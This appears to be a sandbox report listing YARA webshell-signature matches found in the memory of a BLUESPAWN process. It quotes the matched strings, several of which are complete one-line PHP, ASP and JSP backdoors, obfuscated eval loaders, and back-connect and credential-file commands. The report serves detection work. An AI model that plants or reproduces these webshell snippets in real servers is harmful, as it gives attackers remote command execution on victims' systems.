| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_itsec_PHPJackal_itsecteam_shell_jHn | Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php | Florian Roth | - 0x2eafd3:$s0: $link=pg_connect("host=$host dbname=$db user=$user password=$pass");
- 0x2eb024:$s6: while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|
- 0x349348:$s6: while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|
- 0x2eb081:$s9: while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+
- 0x34939b:$s9: while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0x2eb2bb:$s2: if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$stri
- 0x3494ff:$s2: if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$stri
- 0x2eb30e:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x349548:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x2eb355:$s4: <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
- 0x2eb399:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x32502d:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x3495bf:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x372eac:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x2eb3e1:$s9: <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER
- 0x3495fd:$s9: <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 | Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php | Florian Roth | - 0x2eb60d:$s1: <td><input size="48" value="$docr/" name="path" type="text"><input type=
- 0x349753:$s1: <td><input size="48" value="$docr/" name="path" type="text"><input type=
- 0x2eb662:$s2: $uploadfile = $_POST['path'].$_FILES['file']['name'];
- 0x2eb6a4:$s6: elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
- 0x2eb6e4:$s7: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x3150e2:$s7: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_c99shell_c99_w4cking_Shell_xxx | Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci | unknown | - 0x2ebac8:$s0: echo "<b>HEXDUMP:</b><nobr>
- 0x349a64:$s0: echo "<b>HEXDUMP:</b><nobr>
- 0x2ebaf0:$s4: if ($filestealth) {$stat = stat($d.$f);}
- 0x2ebb25:$s5: while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$r
- 0x349aad:$s5: while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$r
- 0x2ebb7b:$s6: if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB
- 0x349af9:$s6: if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB
- 0x2ebbcf:$s8: echo "<center><b>Server-status variables:</b><br><br>";
- 0x2ebc13:$s9: echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea>
- 0x349b7d:$s9: echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz | Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php | Florian Roth | - 0x2ebf1f:$s0: $this -> addFile($content, $filename);
- 0x2ebf52:$s3: function addFile($data, $name, $time = 0) {
- 0x2ebf8a:$s8: function unix2DosTime($unixtime = 0) {
- 0x2ebfbd:$s9: foreach($filelist as $filename){
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_c66_c99_shadows_mod_c99shell | Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php | Florian Roth | - 0x2ec247:$s2: if (unlink(_FILE_)) {@ob_clean(); echo "Thanks for using c99shell v.".$shv
- 0x349f7f:$s2: if (unlink(_FILE_)) {@ob_clean(); echo "Thanks for using c99shell v.".$shv
- 0x2ec2a0:$s3: "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
- 0x2ec2f1:$s4: <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#66
- 0x34a015:$s4: <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#66
- 0x2ec34c:$s7: elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources
- 0x34a066:$s7: elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources
- 0x2ec3a6:$s8: "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehos
- 0x34a0b6:$s8: "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehos
- 0x2ec3fe:$s9: elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!
- 0x34a104:$s9: elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 | Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp | Florian Roth | - 0x2ec787:$s0: ""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>"+
- 0x2ec7d3:$s4: out.println("<h2>File Manager - Current disk ""+(cr.indexOf("/") == 0?
- 0x34a391:$s4: out.println("<h2>File Manager - Current disk ""+(cr.indexOf("/") == 0?
- 0x2ec82b:$s7: String execute = f.canExecute() ? "checked=\"checked\"" : "";
- 0x2ec875:$s8: "<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>
- 0x34a41f:$s8: "<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp | Florian Roth | - 0x2ecc57:$s0: return new Double(format.format(value)).doubleValue();
- 0x2ecc9a:$s5: File tempF = new File(savePath);
- 0x2eccc7:$s9: if (tempF.isDirectory()) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_c99shell_c99_c99shell | Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php | Florian Roth | - 0x2ecf3d:$s2: $bindport_pass = "c99";
- 0x2ecf61:$s5: else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = tr
- 0x34a8a5:$s5: else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = tr
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x2ed273:$s6: $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $d
- 0x34aaad:$s6: $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $d
- 0x2ed2c7:$s7: $sql1 .= $row[1]."\r\n\r\n";
- 0x2ed2f0:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x2ed338:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx | Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php | Florian Roth | - 0x2ed59b:$s3: BODY, TD, TR {
- 0x2ed5b6:$s5: $d=str_replace("\\","/",$d);
- 0x2ed5df:$s6: if ($file=="." || $file=="..") continue;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_807_a_c5_config_css_dm_he1p_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2edef1:$s3: String savePath = request.getParameter("savepath");
- 0x2edf31:$s4: URL downUrl = new URL(downFileUrl);
- 0x2edf61:$s5: if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
- 0x2edfa6:$s6: String downFileUrl = request.getParameter("url");
- 0x2edfe4:$s7: FileInputStream fInput = new FileInputStream(f);
- 0x2ee021:$s8: URLConnection conn = downUrl.openConnection();
- 0x2ee05c:$s9: sis = request.getInputStream();
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2_520_icesword_job_ma1 | Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp | Florian Roth | - 0x2ee315:$s1: <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
- 0x2ee36d:$s3: <input type="hidden" name="_EVENTTARGET" value="" />
- 0x2ee3ae:$s8: <input type="hidden" name="_EVENTARGUMENT" value="" />
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn | Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp | Florian Roth | - 0x2ee778:$s0: <table width="100%" border="1" cellspacing="0" cellpadding="5" bordercol
- 0x34b830:$s0: <table width="100%" border="1" cellspacing="0" cellpadding="5" bordercol
- 0x2ee7cd:$s2: KB </td>
- 0x2ee7e3:$s3: <table width="98%" border="0" cellspacing="0" cellpadding="
- 0x34b887:$s3: <table width="98%" border="0" cellspacing="0" cellpadding="
- 0x2ee82b:$s4: <tr align="center">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY | Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php | Florian Roth | - 0x2eead6:$s4: http://www.4ngel.net
- 0x2f6413:$s4: http://www.4ngel.net
- 0x3173a0:$s4: http://www.4ngel.net
- 0x351215:$s4: http://www.4ngel.net
- 0x2eeaf7:$s5: </a> | <a href="?action=phpenv">PHP
- 0x2eeb27:$s8: echo $msg=@fwrite($fp,$_POST['filecontent']) ? "
- 0x2eeb64:$s9: Codz by Angel
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_locus7s_c99_w4cking_xxx | Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2ef00f:$s1: $res = @shell_exec($cfe);
- 0x2ef035:$s8: $res = @ob_get_contents();
- 0x2ef05c:$s9: @exec($cfe,$res);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_browser_201_3_ma_ma2_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp | Florian Roth | - 0x2ef359:$s1: private static final int EDITFIELD_ROWS = 30;
- 0x2ef393:$s2: private static String tempdir = ".";
- 0x2ef3c4:$s6: <input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>"
- 0x34c010:$s6: <input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_000_403_c5_queryDong_spyjsp2010 | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp | Florian Roth | - 0x2ef6b8:$s2: " <select name='encode' class='input'><option value=''>ANSI</option><option val
- 0x34c1fa:$s2: " <select name='encode' class='input'><option value=''>ANSI</option><option val
- 0x2ef714:$s7: JSession.setAttribute("MSG","<span style='color:red'>Upload File Failed!</spa
- 0x34c24c:$s7: JSession.setAttribute("MSG","<span style='color:red'>Upload File Failed!</spa
- 0x2ef76e:$s8: File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName(
- 0x34c29c:$s8: File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName(
- 0x2ef7c9:$s9: ((Invoker)ins.get("vd")).invoke(request,response,JSession);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_r57shell127_r57_kartal_r57 | Web Shell - from files r57shell127.php, r57_kartal.php, r57.php | Florian Roth | - 0x2efa1e:$s2: $handle = @opendir($dir) or die("Can't open directory $dir");
- 0x2efa68:$s3: if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
- 0x2efac1:$s5: if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_
- 0x34c4fb:$s5: if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_con2 | Web shells - generated from file con2.asp | Florian Roth | - 0x2efc66:$s7: ,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e
- 0x34c61c:$s7: ,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e
- 0x2efcc3:$s10: j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input n
- 0x34c670:$s10: j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input n
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_make2 | Web shells - generated from file make2.php | Florian Roth | - 0x2efe67:$s1: error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8
- 0x34c790:$s1: error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_aaa | Web shells - generated from file aaa.asp | Florian Roth | - 0x2f0009:$s0: Function fvm(jwv):If jwv=""Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt="
- 0x34c8ae:$s0: Function fvm(jwv):If jwv=""Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt="
- 0x2f0062:$s5: <option value=""DROP TABLE [jnc];exec mast"&kvp&"er..xp_regwrite 'HKEY_LOCAL
- 0x34c8fd:$s5: <option value=""DROP TABLE [jnc];exec mast"&kvp&"er..xp_regwrite 'HKEY_LOCAL
- 0x2f00bb:$s17: if qpv="" then qpv="x:\Program Files\MySQL\MySQL Server 5.0\my.ini"&br&
- 0x34c94d:$s17: if qpv="" then qpv="x:\Program Files\MySQL\MySQL Server 5.0\my.ini"&br&
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Expdoor_com_ASP | Web shells - generated from file Expdoor.com ASP.asp | Florian Roth | - 0x2f025f:$s4: ">www.Expdoor.com</a>
- 0x2f0281:$s5: <input name="FileName" type="text" value="Asp_ver.Asp" size="20" max
- 0x34ca85:$s5: <input name="FileName" type="text" value="Asp_ver.Asp" size="20" max
- 0x2f02d6:$s10: set file=fs.OpenTextFile(server.MapPath(FileName),8,True) '
- 0x2f031f:$s14: set fs=server.CreateObject("Scripting.FileSystemObject") '
- 0x2f0368:$s16: <TITLE>Expdoor.com ASP
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_php2 | Web shells - generated from file php2.php | Florian Roth | - 0x2f04d3:$s0: <?php $s=@$_GET[2];if(md5($s.$s)==
- 0x34cc38:$s0: <?php $s=@$_GET[2];if(md5($s.$s)==
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_bypass_iisuser_p | Web shells - generated from file bypass-iisuser-p.asp | Florian Roth | - 0x2f0654:$s0: <%Eval(Request(chr(112))):Set fso=CreateObject
- 0x34cd35:$s0: <%Eval(Request(chr(112))):Set fso=CreateObject
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_sig_404super | Web shells - generated from file 404super.php | Florian Roth | - 0x2f07d5:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
- 0x2f0807:$s6: 'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),
- 0x2f0860:$s7: //http://require.duapp.com/session.php
- 0x2f0893:$s8: if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}
- 0x2f08ea:$s12: //define('pass','123456');
- 0x2f0911:$s13: $GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO
- 0x34cf3e:$s13: $GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_JSP | Web shells - generated from file JSP.jsp | Florian Roth | - 0x2f0ab4:$s1: void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i
- 0x34d05d:$s1: void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i
- 0x2f0b11:$s5: bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.app
- 0x34d0b0:$s5: bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.app
- 0x2f0b6a:$s11: if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequest
- 0x34d100:$s11: if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequest
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshell_123 | Web shells - generated from file webshell-123.php | Florian Roth | - 0x2f0d0f:$s0: // Web Shell!!
- 0x2f0d2a:$s1: @preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6
- 0x34d232:$s1: @preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6
- 0x2f0d79:$s3: $default_charset = "UTF-8";
- 0x2f0da1:$s4: // url:http://www.weigongkai.com/shell/
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_dev_core | Web shells - generated from file dev_core.php | Florian Roth | - 0x2f0f17:$s1: if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {
- 0x2f0f5f:$s9: setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);
- 0x2f0fa5:$s10: $_SESSION['code'] = _REQUEST(sprintf("%s?%s",pack("H*",'6874
- 0x34d402:$s10: $_SESSION['code'] = _REQUEST(sprintf("%s?%s",pack("H*",'6874
- 0x2f0fee:$s11: if (preg_match("/^HTTP\/\d\.\d\s([\d]+)\s.*$/", $status, $matches))
- 0x34d442:$s11: if (preg_match("/^HTTP\/\d\.\d\s([\d]+)\s.*$/", $status, $matches))
- 0x2f103e:$s12: eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C
- 0x34d489:$s12: eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C
- 0x2f108f:$s15: if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))
- 0x34d4d1:$s15: if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_pHp | Web shells - generated from file pHp.php | Florian Roth | - 0x2f122e:$s0: if(is_readable($path)) antivirus($path.'/',$exs,$matches);
- 0x2f1275:$s1: '/(eval|assert|include|require|include\_once|require\_once|array\_map|arr
- 0x34d629:$s1: '/(eval|assert|include|require|include\_once|require\_once|array\_map|arr
- 0x2f12cb:$s13: '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*
- 0x34d676:$s13: '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*
- 0x2f1319:$s14: '/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+
- 0x34d6bb:$s14: '/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+
- 0x2f1369:$s19: '/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once
- 0x34d702:$s19: '/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_pppp | Web shells - generated from file pppp.php | Florian Roth | - 0x2f1505:$s0: Mail: chinese@hackermail.com
- 0x2f152e:$s3: if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo
- 0x34d839:$s3: if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo
- 0x2f1587:$s6: Site: http://blog.weili.me
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_code | Web shells - generated from file code.php | Florian Roth | - 0x2f16f6:$s1: <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_fi
- 0x34d973:$s1: <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_fi
- 0x2f174a:$s7: $file = !empty($_POST["dir"]) ? urldecode(self::convert_to_utf8(rtrim($_PO
- 0x34d9bd:$s7: $file = !empty($_POST["dir"]) ? urldecode(self::convert_to_utf8(rtrim($_PO
- 0x2f17a1:$s10: if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_
- 0x34da0b:$s10: if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_
- 0x2f17fa:$s14: Processed in <span id="runtime"></span> second(s) {gzip} usage:
- 0x34da5b:$s14: Processed in <span id="runtime"></span> second(s) {gzip} usage:
- 0x2f1846:$s17: <a href="javascript:;;;" name="{return_link}" onclick="fileperm
- 0x34da9e:$s17: <a href="javascript:;;;" name="{return_link}" onclick="fileperm
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_jspyyy | Web shells - generated from file jspyyy.jsp | Florian Roth | - 0x2f19de:$s0: <%@page import="java.io.*"%><%if(request.getParameter("f")
- 0x34dbb2:$s0: <%@page import="java.io.*"%><%if(request.getParameter("f")
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_xxxx | Web shells - generated from file xxxx.php | Florian Roth | - 0x2f1b6d:$s0: <?php eval($_POST[1]);?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_JJjsp3 | Web shells - generated from file JJjsp3.jsp | Florian Roth | - 0x2f1ce0:$s0: <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!S
- 0x34ddac:$s0: <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!S
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_PHP1 | Web shells - generated from file PHP1.php | Florian Roth | - 0x2f1e83:$s0: <[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>
- 0x2f1ed6:$s2: :https://forum.90sec.org/forum.php?mod=viewthread&tid=7316
- 0x2f1f1d:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_JJJsp2 | Web shells - generated from file JJJsp2.jsp | Florian Roth | - 0x2f20a3:$s2: QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z
- 0x34e053:$s2: QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z
- 0x2f20fc:$s8: sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ
- 0x34e0a2:$s8: sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ
- 0x2f2150:$s10: ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData()
- 0x34e0ed:$s10: ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData()
- 0x2f2197:$s11: return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase(
- 0x34e12b:$s11: return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase(
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_radhat | Web shells - generated from file radhat.asp | Florian Roth | - 0x2f233e:$s1: sod=Array("D","7","S
- 0x34e24e:$s1: sod=Array("D","7","S
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_asp1 | Web shells - generated from file asp1.asp | Florian Roth | - 0x2f24a7:$s0: http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave
- 0x2f24e7:$s2: <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_php6 | Web shells - generated from file php6.php | Florian Roth | - 0x2f2672:$s1: array_map("asx73ert",(ar
- 0x34e470:$s1: array_map("asx73ert",(ar
- 0x2f2697:$s3: preg_replace("/[errorpage]/e",$page,"saft");
- 0x2f26d0:$s4: shell.php?qid=zxexp
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_xxx | Web shells - generated from file xxx.php | Florian Roth | - 0x2f2838:$s3: <?php array_map("ass\x65rt",(array)$_REQUEST['expdoor']);?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_GetPostpHp | Web shells - generated from file GetPostpHp.php | Florian Roth | - 0x2f29c6:$s0: <?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_php5 | Web shells - generated from file php5.php | Florian Roth | - 0x2f2b4a:$s0: <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u
- 0x34e7a8:$s0: <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_PHP | Web shells - generated from file PHP.php | Florian Roth | - 0x2f2ced:$s1: echo "<font color=blue>Error!</font>";
- 0x2f2d20:$s2: <input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILE
- 0x34e8f0:$s2: <input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILE
- 0x2f2d78:$s5: - ExpDoor.com</title>
- 0x2f2d9b:$s10: $f=fopen($_POST["f"],"w");
- 0x2f2dc2:$s12: <textarea name="c" cols=60 rows=15></textarea><br>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_Asp | Web shells - generated from file Asp.asp | Florian Roth | - 0x2f2f47:$s1: Execute MorfiCoder(")/*/z/*/(tseuqer lave")
- 0x2f2f7f:$s2: Function MorfiCoder(Code)
- 0x2f2fa5:$s3: MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | perlbot_pl | Semi-Auto-generated - file perlbot.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f30e2:$s0: my @adms=("Kelserific","Puna","nod32")
- 0x34ebaa:$s0: my @adms=("Kelserific","Puna","nod32")
- 0x2f3115:$s1: #Acesso a Shel - 1 ON 0 OFF
- 0x34ebd3:$s1: #Acesso a Shel - 1 ON 0 OFF
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | php_backdoor_php | Semi-Auto-generated - file php-backdoor.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f3234:$s0: http://michaeldaw.org 2006
- 0x308ed3:$s0: http://michaeldaw.org 2006
- 0x309818:$s0: http://michaeldaw.org 2006
- 0x34ec9e:$s0: http://michaeldaw.org 2006
